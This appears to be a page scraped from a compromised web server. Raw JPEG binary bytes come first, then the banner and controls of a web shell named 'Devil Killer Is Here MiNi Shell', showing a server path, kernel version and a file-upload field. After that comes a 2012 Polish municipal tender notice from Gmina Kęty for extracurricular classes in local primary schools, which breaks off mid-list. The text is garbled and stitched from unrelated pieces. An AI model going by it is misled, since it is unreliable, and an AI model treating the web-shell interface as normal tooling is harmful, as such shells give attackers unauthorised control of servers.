JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/15715-N-2012.html

<p class="kh_header"><b>Kęty: Usługi edukacyjne obejmujące przeprowadzenie zajęć pozalekcyjnych w ramach projektu -Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Kęty.- współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 15715 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kęty , Rynek 7, 32-650 Kęty, woj. małopolskie, tel. 033 844-76-70, faks 033 8447660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kety.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące przeprowadzenie zajęć pozalekcyjnych w ramach projektu -Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Kęty.- współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć pozalekcyjnych w ramach projektu -Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Kęty- nr WND-POKL.09.01.02-12-108/11 w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX -Rozwój wykształcenia i kompetencji w regionach-, Poddziałanie 9.1.2 -Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych-
Zajęcia będą odbywać się w roku szkolnym 2011/2012 (II semestr), 2012/2013, 2013/2014 (I semestr) 
w szkołach, dla których organem prowadzącym jest Gmina Kęty.
2. Klasyfikacja wg kodów CPV:
80.10.00.00-5 usługi szkolnictwa podstawowego
3. Szczegółowy opis przedmiotu zamówienia:
Usługi będą realizowane w następujących szkołach i specjalnościach. Jednostka 1godzina w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji  i harmonogramem), w terminie maksymalnym do 31.12.2013r. 
b)decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia.

Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach
1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
a)w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy I - 7 uczniów,
b)w roku szkolnym 2011/2012 - 42 godzin zajęć dla grupy II - 7 uczniów,
c)w roku szkolnym 2011/2012 - 42 godzin zajęć dla grupy III - 7 uczniów,
d)w roku szkolnym 2011/2012 - 42 godzin zajęć dla grupy IV- 7 uczniów,
e)w roku szkolnym 2011/2012 - 42 godzin zajęć dla grupy V- 7 uczniów,
f)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 5 uczniów,,
g)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 5 uczniów,
h)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III - 5 uczniów,
i)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy IV - 5 uczniów,
j)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy V - 5 uczniów,
k)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VI - 5 uczniów,
l)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VII - 5 uczniów,
m)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VIII - 5 uczniów,
n)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy IX - 5 uczniów,
o)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy X - 5 uczniów,
p)w roku szkolnym 2013/2014 - 48 godzin zajęć dla grupy I - 8 uczniów,
q)w roku szkolnym 2013/2014 - 48 godzin zajęć dla grupy II - 8 uczniów,
r)w roku szkolnym 2013/2014 - 48 godzin zajęć dla grupy III - 8 uczniów,
s)w roku szkolnym 2013/2014 - 48 godzin zajęć dla grupy IV - 8 uczniów,
t)w roku szkolnym 2013/2014 - 48 godzin zajęć dla grupy V - 8 uczniów,

2.Zajęcia - gimnastyka korekcyjna: 
a)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy I - 8 uczniów, 
b)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy II - 8 uczniów, 
c)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 8 uczniów, 
d)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 8 uczniów, 
e)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III- 8 uczniów, 
f)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy I - 8 uczniów,
g)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy II - 8 uczniów
h)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy III- 8 uczniów

3.Specjalistyczne zajęcia terapeutyczne korekcyjno-kompensacyjne -  w roku szkolnym 2011/2012 - 30 godzin zajęć dla 4 uczniów, w roku szkolnym 2012/2013- 30 godzin zajęć dla 4 uczniów, w roku szkolnym 2013/2014 - 30 godzin zajęć dla 4 uczniów,
4.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych:  

a)w roku szkolnym 2011/2012 -  30 godzin zajęć dla grupy I - 8 uczniów,
b)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy II - 8 uczniów,
c)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy III - 8 uczniów,
d)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy IV- 8 uczniów,
e)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy V- 8 uczniów,
f)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy VI - 8 uczniów,,
g)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 8 uczniów,
h)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 8 uczniów,
i)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III - 8 uczniów,
p)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy I - 8 uczniów,
q)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy II - 8 uczniów,
r)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy III - 8 uczniów,
 
5.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie:

a)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy I - 8 uczniów,
b)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 8 uczniów,
c)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 8 uczniów,

6.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - język angielski:
a)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy I - 8 uczniów,
b)w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy I - 8 uczniów,

Zadanie nr II. Szkoła Podstawowa nr 2 w Kętach

1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
a)w roku szkolnym 2011/2012 -  30 godzin zajęć dla grupy I - 5 uczniów,
b)w roku szkolnym 2011/2012 - 30godzin zajęć dla grupy II - 5 uczniów,
c)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy III - 5 uczniów,
d)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy IV- 5 uczniów,
e)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy V- 5 uczniów,
f)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy VI- 5 uczniów,
g)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy VII- 5 uczniów,
h)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 5 uczniów,
i)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 5 uczniów,
j)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III - 5 uczniów,
k)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy IV - 5 uczniów,
l)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy V - 5 uczniów,
m)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VI - 5 uczniów,
n)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy VII - 5 uczniów,
o)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy I - 5 uczniów,
p)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy II - 5 uczniów,
q)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy III - 5 uczniów,
r)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy IV - 5 uczniów,
s)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy V - 5 uczniów,
t)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy VI - 5 uczniów,
u)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy VII - 5 uczniów,

2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
a)w roku szkolnym 2011/2012 -  30 godzin zajęć dla grupy I - 6 uczniów,
b)w roku szkolnym 2011/2012 - 30godzin zajęć dla grupy II - 6 uczniów,
c)w roku szkolnym 2011/2012 - 30 godzin zajęć dla grupy III - 6 uczniów,
d)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 6 uczniów,
e)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 6 uczniów,
f)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy III - 6 uczniów,
g)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy I - 6 uczniów,
h)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy II - 6 uczniów,
i)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy III - 6 uczniów,

3.Zajęcia logopedyczne:
a)w roku szkolnym 2011/2012 -  90 godzin zajęć dla grupy I - 2 uczniów,
b)w roku szkolnym 2011/2012 - 90godzin zajęć dla grupy II - 2 uczniów,
c)w roku szkolnym 2012/2013 - 90 godzin zajęć dla grupy I - 2 uczniów,
d)w roku szkolnym 2012/2013 - 90 godzin zajęć dla grupy II - 2 uczniów,
e)w roku szkolnym 2013/2014 -  90 godzin zajęć dla grupy I - 2 uczniów,
f)w roku szkolnym 2013/2014 -  90 godzin zajęć dla grupy II - 2 uczniów,

4.Zajęcia - gimnastyka korekcyjna -  w roku szkolnym 2011/2012 - 30 godzin zajęć dla 12 uczniów, w roku szkolnym 2012/2013- 30 godzin zajęć dla 12 uczniów, w roku szkolnym 2013/2014 - 30 godzin zajęć dla 12 uczniów,

5.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych:  
a)w roku szkolnym 2011/2012 -  30 godzin zajęć dla grupy I - 8 uczniów,
b)w roku szkolnym 2011/2012 - 30godzin zajęć dla grupy II - 8 uczniów,
c)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 8 uczniów,
d)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 8 uczniów,
e)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy I - 8 uczniów,
f)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy II - 8 uczniów,

6.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - j. angielski: 
a)w roku szkolnym 2011/2012 -  30 godzin zajęć dla grupy I - 8 uczniów,
b)w roku szkolnym 2011/2012 - 30godzin zajęć dla grupy II - 8 uczniów,
c)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 8 uczniów,
d)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 8 uczniów,
e)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy I - 8 uczniów,
f)w roku szkolnym 2013/2014 -  30 godzin zajęć dla grupy II - 8 uczniów,


Zadanie nr III. Szkoła Podstawowa nr 3 w Kętach

1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
a)w roku szkolnym - 2011/2012 - 30 godzin zajęć dla 5 uczniów, 
b)w roku szkolnym 2012/2013- 30 godzin zajęć dla 5 uczniów, 
c)w roku szkolnym 2013/2014 - 30 godzin zajęć dla 5 uczniów,

2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
a) w roku szkolnym 2011/2012 - 30 godzin zajęć dla 5 uczniów, 
b)w roku szkolnym 2012/2013- 30 godzin zajęć dla 5 uczniów, 
c)w roku szkolnym 2013/2014 - 30 godzin zajęć dla 5 uczniów,

3.Zajęcia - gimnastyka korekcyjna:
a) w roku szkolnym 2011/2012 - 30 godzin zajęć dla 12 uczniów, 
b)w roku szkolnym 2012/2013- 30 godzin zajęć dla 12 uczniów, 
c)w roku szkolnym 2013/2014 - 30 godzin zajęć dla 12 uczniów,

4.Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych - w roku szkolnym 2011/2012 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym 2012/2013- 30 godzin zajęć dla 5 uczniów, w roku szkolnym 2013/2014 - 30 godzin zajęć dla 5 uczniów,
5.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych:   
a)w roku szkolnym 2011/2012 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym 2012/2013- 30 godzin zajęć dla 5 uczniów, 
b)w roku szkolnym 2013/2014 - 30 godzin zajęć dla 5 uczniów,
6.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych plastycznie:
a) w roku szkolnym 2011/2012 - 30 godzin zajęć dla 6 uczniów, w roku szkolnym 2012/2013- 30 godzin zajęć dla 6 uczniów, 
b)w roku szkolnym 2013/2014 - 30 godzin zajęć dla 6 uczniów,


Zadanie nr IV. Szkoła Podstawowa w Bulowicach 

1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
a)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2012/2013 40 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2013/2014 - 40 godzin zajęć dla grupy I- 8 uczniów
b)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2012/2013 -  40 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla grupy II- 8 uczniów,
c)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy III- 8 uczniów, w roku szkolnym  2012/2013 - 40 godzin zajęć dla grupy III- 8 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla grupy III- 8 uczniów 

2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
a)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2012/2013 40 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2013/2014 - 40 godzin zajęć dla grupy I- 8 uczniów
b)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2012/2013 -  40 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla grupy II- 8 uczniów,

3.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych: w roku szkolnym  - 2011/2012 - 40 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 40 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla 8 uczniów,

4.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych plastycznie:
a)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2012/2013 - 39 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2013/2014 - 40 godzin zajęć dla grupy I- 8 uczniów
b)w roku szkolnym  2011/2012 - 40 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2012/2013 -  39 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2013/2014 - 39 godzin zajęć dla grupy II- 8 uczniów,

5.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych muzycznie  - w roku szkolnym  2011/2012 - 40 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 40 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla 8 uczniów,

Zadanie nr V. Szkoła Podstawowa w Bielanach
 
1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów,
2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów,
3.Zajęcia logopedyczne - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 4 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 4 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 4 uczniów,
4.Zajęcia - gimnastyka korekcyjna -  w roku szkolnym  2011/2012 - 30 godzin zajęć dla 12 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 12 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 12 uczniów,
5.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych plastycznie - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów, 
6.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych matematyczno-informatycznie  - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów,

Zadanie nr VI. Szkoła Podstawowa w Łękach
 
1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 5 uczniów,
2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 5 uczniów,
3.Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 4 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 4 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 4 uczniów,
4.Zajęcia - gimnastyka korekcyjna -  w roku szkolnym  2011/2012 - 30 godzin zajęć dla 12 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 12 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 12 uczniów,
5.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych artystycznie - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 5 uczniów,

Zadanie nr VII. Szkoła Podstawowa w Witkowicach 

1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym - w roku szkolnym  2011/2012 - 40 godzin zajęć dla 5 uczniów, w roku szkolnym  2012/2013- 40 godzin zajęć dla 6 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla 5 uczniów,
2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - w roku szkolnym  2011/2012 - 40 godzin zajęć dla 5 uczniów, w roku szkolnym  2012/2013- 40 godzin zajęć dla 6 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla 5 uczniów,
3.Zajęcia - gimnastyka korekcyjna -  w roku szkolnym  2011/2012 - 50 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013- 50 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 50 godzin zajęć dla 8 uczniów,
4.Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych mtematycznie - w roku szkolnym  2011/2012 - 40 godzin zajęć dla 4 uczniów, w roku szkolnym  2012/2013- 40 godzin zajęć dla 4 uczniów, w roku szkolnym  2013/2014 - 40 godzin zajęć dla 4 uczniów,

Zadanie nr VIII. Szkoła Podstawowa w Malcu

1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
a)w roku szkolnym  2011/2012 - 30 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2012/2013 30 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy I- 8 uczniów
b)w roku szkolnym  2011/2012 - 30 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2012/2013 -  30 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla grupy II- 8 uczniów,

2.Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów,

3.Zajęcia - gimnastyka korekcyjna -  w roku szkolnym  2011/2012 - 90 godzin zajęć dla 12 uczniów, w roku szkolnym  2012/2013 - 90 godzin zajęć dla 12 uczniów, w roku szkolnym  2013/2014 - 90 godzin zajęć dla 12 uczniów,


Zadanie nr IX. Szkoła Podstawowa w Nowej Wsi 

1.Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
